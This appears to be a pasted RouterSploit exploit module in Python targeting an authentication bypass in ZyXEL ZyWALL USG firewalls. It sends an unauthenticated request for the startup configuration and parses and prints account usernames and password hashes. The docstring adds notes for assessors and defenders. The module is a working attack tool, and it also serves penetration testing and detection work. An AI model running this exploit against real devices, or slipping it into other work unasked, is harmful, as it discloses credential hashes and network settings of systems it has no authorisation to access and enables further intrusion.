
Untitled

a guest
Aug 23rd, 2019
  1. import re
  2. from routersploit.core.exploit import *
  3. from routersploit.core.http.http_client import HTTPClient
  4.  
  5.  
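  class Exploit(HTTPClient):
      """RouterSploit module for the ZyXEL ZyWALL USG configuration-export authentication bypass.

      The module issues one GET request for the startup configuration to the
      export CGI and supplies no credentials or session with it.  A device
      that answers with the configuration is exposing password hashes,
      firewall rules and other network settings to anyone who can reach its
      web interface.

      Notes for assessors and defenders:

      * A request for ``/cgi-bin/export-cgi/images/`` with ``category=config``
        that is not tied to a logged-in administrator is the observable to
        look for in the appliance's web-interface logs.
      * Hashes returned by a vulnerable device should be treated as disclosed,
        so the affected accounts need new passwords.  The table printed by
        ``run`` contains those hashes; console logs and reports that capture
        it are sensitive.
      * See the advisory listed under ``references`` for affected firmware
        and remediation.
      """

      __info__ = {
          "name": "Zyxel ZyWALL USG Extract Hashes",
          "description": "Exploit implementation for ZyWall USG 20 Authentication Bypass In Configuration Import/Export. "
                         "If the target is vulnerable it allows to download configuration files which contains "
                         "sensitive data like password hashes, firewall rules and other network related configurations.",
          "authors": (
              "RedTeam Pentesting",  # vulnerability discovery
          ),
          "references": (
              "https://www.exploit-db.com/exploits/17244/",
          ),
          "devices": (
              "ZyXEL ZyWALL USG-20",
              "ZyXEL ZyWALL USG-20W",
              "ZyXEL ZyWALL USG-50",
              "ZyXEL ZyWALL USG-100",
              "ZyXEL ZyWALL USG-200",
              "ZyXEL ZyWALL USG-300",
              "ZyXEL ZyWALL USG-1000",
              "ZyXEL ZyWALL USG-1050",
              "ZyXEL ZyWALL USG-2000",
          ),
      }

      target = OptIP("", "Target IPv4 or IPv6 address")
      port = OptPort(443, "Target HTTP port")
      ssl = OptBool(True, "SSL enabled: true/false")

      def __init__(self):
          # (username, hash, user type) tuples parsed by the most recent check().
          self.credentials = []

      def run(self):
          """Run the check and print any account entries found in the exported configuration."""
          self.credentials = []

          if self.check():
              print_success("Target appears to be vulnerable")
              # The table contains password hashes: treat captured output as sensitive.
              print_table(("Username", "Hash", "User type"), *self.credentials)
          else:
              print_error("Exploit failed - target seems to be not vulnerable")

      @mute
      def check(self):  # TODO: requires improvement
          """Request the startup configuration and collect the account lines it contains.

          Returns:
              True when the response has status 200 and at least one
              ``username ... password ... user-type ...`` line was parsed,
              False otherwise.  The parsed entries are stored in
              ``self.credentials``.
          """
          # Reset on every call: without this, entries parsed during an earlier
          # check() (possibly against a different target) stay in the list,
          # get duplicated, and make a non-vulnerable device report as vulnerable.
          self.credentials = []

          path = "/cgi-bin/export-cgi/images/?category={}&arg0={}".format('config', 'startup-config.conf')
          response = self.http_request(
              method="GET",
              path=path,
          )

          if response is None or response.status_code != 200:
              return False  # target is not vulnerable

          # Compiled once instead of once per configuration line.
          account_line = re.compile(r"username (.*) password (.*) user-type (.*)", re.I | re.M)
          for line in response.text.split("\n"):
              match = account_line.match(line.strip())
              if match:
                  self.credentials.append(match.groups())

          # A 200 response alone is not evidence: only parsed account entries
          # count as confirmation that the configuration was disclosed.
          return bool(self.credentials)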